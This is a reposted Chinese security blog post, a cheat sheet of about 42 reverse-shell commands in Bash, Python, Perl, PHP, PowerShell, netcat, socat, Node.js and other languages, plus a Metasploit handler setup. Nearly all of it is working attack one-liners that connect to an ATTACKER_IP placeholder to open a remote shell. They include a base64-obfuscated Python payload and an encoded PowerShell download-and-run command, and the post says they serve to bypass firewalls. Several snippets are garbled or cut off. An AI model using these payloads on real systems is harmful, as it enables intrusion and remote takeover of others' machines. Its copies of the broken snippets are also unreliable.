杨CC有话说

文章来源于公众号:泷羽Sec
如有侵权请联系删除

常见的42种反弹shell方式

前言

  • 这一篇主要介绍常用的反弹shell的命令
  • 在平时获取到命令执行执行权限的时候,通常都需要使用反弹shell来获取一个稳定的shell,从而绕过防火墙等安全机制的限制
  • 另外反弹过来的shell有一个优点,就是通过/bin/bash或者python3 -c 'import pty;pty.spawn("/bin/bash")'或者其他命令来创建交互式 shell,从而能够执行像su命令切换用户,添加用户相关的命令,它会让你输入相关的信息,这个输入的过程是普通的shell所做不到的,例如:
  • 那么接下来就看看反弹shell的方式有哪些
  • 注意:ATTACKER_IP代表你需要将一个shell反弹到的地址,port代表反弹shell的端口

基于Bash/Terminal的反弹

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 2.1 经典TCP反弹
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1

# 2.2 使用文件描述符
exec 5<>/dev/tcp/ATTACKER_IP/PORT; cat <&5 | while read line; do $line 2>&5 >&5; done

# 2.3 使用管道
mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | nc ATTACKER_IP PORT > /tmp/f

# 2.4 UDP反弹(较少检测)
bash -i >& /dev/udp/ATTACKER_IP/PORT 0>&1

# 2.5 反弹到多个端口
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 & bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1

# 2.6 bash反弹绕过
bash -c '/bin/bash -i >& /dev/tcp/10.10.10.130/1234 0>&1'

Python 反弹 shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 3.1 Python2

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("ATTACKER\_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"]);'

# 3.2 Python3

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER\_IP",PORT));\[os.dup2(s.fileno(),fd) for fd in (0,1,2)];import pty; pty.spawn("/bin/bash")'

# 3.3 Python使用pty模块

python -c 'import pty, socket, os;s=socket.socket(); s.connect(("ATTACKER\_IP",PORT)); \[os.dup2(s.fileno(),f) for f in (0,1,2)]; pty.spawn("/bin/sh")'

# 3.4 Python单行编码

python -c "exec(\_\_import\_\_('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIkFUVEFDS0VSX0lQIixQT1JUKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ=='))"

Perl 反弹 shell

1
2
3
4
5
6
7
# 4.1 经典Perl反弹

perl -e 'use Socket;\$i="ATTACKER\_IP";\$p=PORT;socket(S,PF\_INET,SOCK\_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr\_in(\$p,inet\_aton(\$i)))){open(STDIN,">\&S");open(STDOUT,">\&S");open(STDERR,">\&S");exec("/bin/sh -i");};'

# 4.2 Perl简写版

perl -MIO -e '\$p=fork;exit,if(\$p);\$c=new IO::Socket::INET(PeerAddr,"ATTACKER\_IP:PORT");STDIN->fdopen(\$c,r);$\~->fdopen(\$c,w);system$\_ while

PHP 反弹 shell

1
2
3
4
5
6
7
8
9
10
11
# 5.1 PHP fsockopen

php -r '\$sock=fsockopen("ATTACKER\_IP",PORT);exec("/bin/sh -i  >&3 2>&3");'

# 5.2 PHP socket\_create

php -r '\$s=socket\_create(AF\_INET,SOCK\_STREAM,SOL\_TCP);socket\_connect(\$s,"ATTACKER\_IP",PORT);exec("/bin/sh -i  >&3 2>&3");'

# 5.3 PHP反引号执行

php -r 'system("bash -c \\'bash -i >& /dev/tcp/ATTACKER\_IP/PORT 0>&1\\'");'

Ruby 反弹 shell

1
2
3
4
5
6
7
# 6.1 Ruby TCPSocket

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ATTACKER\_IP","PORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

# 6.2 Ruby exec

ruby -rsocket -e 'c=TCPSocket.new("ATTACKER\_IP","PORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Java 反弹 shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 7.1 Java Runtime.exec

Runtime.getRuntime().exec(new String\[]{"/bin/bash","-c","exec 5dev/tcp/ATTACKER\_IP/PORT;cat  line; do \$line 2>&5 >&5; done"});

# 7.2 Java完整类(需编译运行)

public class ReverseShell {

&#x20;   public static void main(String\[] args) throws Exception {

&#x20;       String\[] cmd = {"/bin/bash", "-c", "bash -i >& /dev/tcp/ATTACKER\_IP/PORT 0>&1"};

&#x20;       Runtime.getRuntime().exec(cmd);

&#x20;   }

}

PowerShell 反弹 shell

1
2
3
4
5
6
7
# 8.1 PowerShell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("ATTACKER\_IP",PORT);\$stream = \$client.GetStream();\[byte\[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2  = \$sendback + "PS " + (pwd).Path + "> ";\$sendbyte = (\[text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()

# 8.2 PowerShell Base64编码

powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AQQBUAFQAQQBDAEsARQBSAF8ASQBQADoAUABPAFIAVAAvAHIAZQB2AGUAcgBzAGUALgBwAHMAMQAnACkA

Netcat 反弹 shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# 9.1 nc传统版

nc -e /bin/sh ATTACKER\_IP PORT

# 9.2 nc没有-e参数时

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER\_IP PORT >/tmp/f

# 9.3 nc UDP反弹

nc -u ATTACKER\_IP PORT -e /bin/sh

# 9.4 ncat(nmap版)

ncat ATTACKER\_IP PORT -e /bin/bash

# 9.5 nc反弹msf(Metasploit handler配置)

msfconsole

use exploit/multi/handler

set PAYLOAD windows/shell\_reverse\_tcp

set LHOST 192.168.53.51

set LPORT 1234

run -j

use multi/recon/local\_exploit\_suggester

set session 3

run

Socat 反弹 shell

1
2
3
4
5
6
7
8
9
10
11
# 10.1 Socat TCP

socat TCP:ATTACKER\_IP:PORT EXEC:/bin/bash

# 10.2 Socat UDP

socat UDP:ATTACKER\_IP:PORT EXEC:/bin/bash

# 10.3 Socat SSL加密

socat OPENSSL:ATTACKER\_IP:PORT EXEC:/bin/bash

Awk 反弹 shell

1
2
3
# 11.1 Awk TCP连接

awk 'BEGIN {s = "/inet/tcp/0/ATTACKER\_IP/PORT"; while(1) { do { printf "shell>" |& s; s |& getline c; if(c) { while ((c |& getline) > 0) print \$0 |& s; close(c); } } while(c != "exit") close(s); }}'

Telnet 反弹 shell

1
2
3
# 12.1 Telnet双端口

telnet ATTACKER\_IP 4444 | /bin/sh | telnet ATTACKER\_IP 4445

Lua 反弹 shell

1
2
3
# 13.1 Lua socket

lua -e "require('socket');require('os');t=socket.tcp();t:connect('ATTACKER\_IP','PORT');os.execute('/bin/sh -i 3 >&3 2>&3');"

Go 反弹 shell

1
2
3
# 14.1 Go语言单行

echo 'package main;import"os/exec";import"net";func main(){c,\_:=net.Dial("tcp","ATTACKER\_IP:PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go

Node.js 反弹 shell

1
2
3
4
5
6
7
# 15.1 Node.js子进程

require('child\_process').exec('nc -e /bin/sh ATTACKER\_IP PORT')

# 15.2 Node.js socket版

(function(){ var net = require("net"), cp = require("child\_process"), sh = cp.spawn("/bin/sh", \[]); var client = new net.Socket(); client.connect(PORT, "ATTACKER\_IP", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();

Openssl 加密反弹

1
2
3
4
5
6
7
# 16.1 Openssl加密连接

mkfifo /tmp/s; /bin/sh -i  2>&1 | openssl s\_client -quiet -connect ATTACKER\_IP:PORT > /tmp/s; rm /tmp/s

# 16.2 Openssl证书认证

openssl s\_client -connect ATTACKER\_IP:PORT -quiet -cert client.pem -key client.key

Zsh 反弹 shell

1
2
3
# 17.1 Zsh内置TCP

zsh -c 'zmodload zsh/net/tcp && ztcp ATTACKER\_IP PORT && zsh >&\$REPLY 2>&\$REPLY 0>&\$REPLY'

Expect 反弹 shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 18.1 Expect脚本(保存为.exp文件执行)

\#!/usr/bin/expect

set host ATTACKER\_IP

set port PORT

spawn /bin/bash

expect "\$ "

send "bash -i >& /dev/tcp/\$host/\$port 0>&1\r"

interact

基于 /dev/tcp 的各种变形

1
2
3
4
5
6
7
8
9
10
11
# 19.1 使用exec重定向

0<&196;exec 196dev/tcp/ATTACKER\_IP/PORT; sh &196 2>&196

# 19.2 使用readline

exec 5<>/dev/tcp/ATTACKER\_IP/PORT; cat  while read line; do \$line 2>&5 >&5; done

# 19.3 使用coproc(bash 4.0+)

coproc nc ATTACKER\_IP PORT; cat \${COPROC\[0]}" >&"\${COPROC\[1]}"

结束语

  • CTRl+D 将本网站:ycc77.com添加到书签栏哦~
  • 需要资源,记得将ycc77.cn 添加到书签栏哦~
  • QQ交流群:660264846(满)
  • QQ交流群2:721170435
  • B站: 疯狂的杨CC
  • 抖音: 疯狂的杨CC
  • 快手: 疯狂的杨CC
  • 公众号:SGY安全
  • 91: 疯狂的杨CC
  • p站: 疯狂的杨CC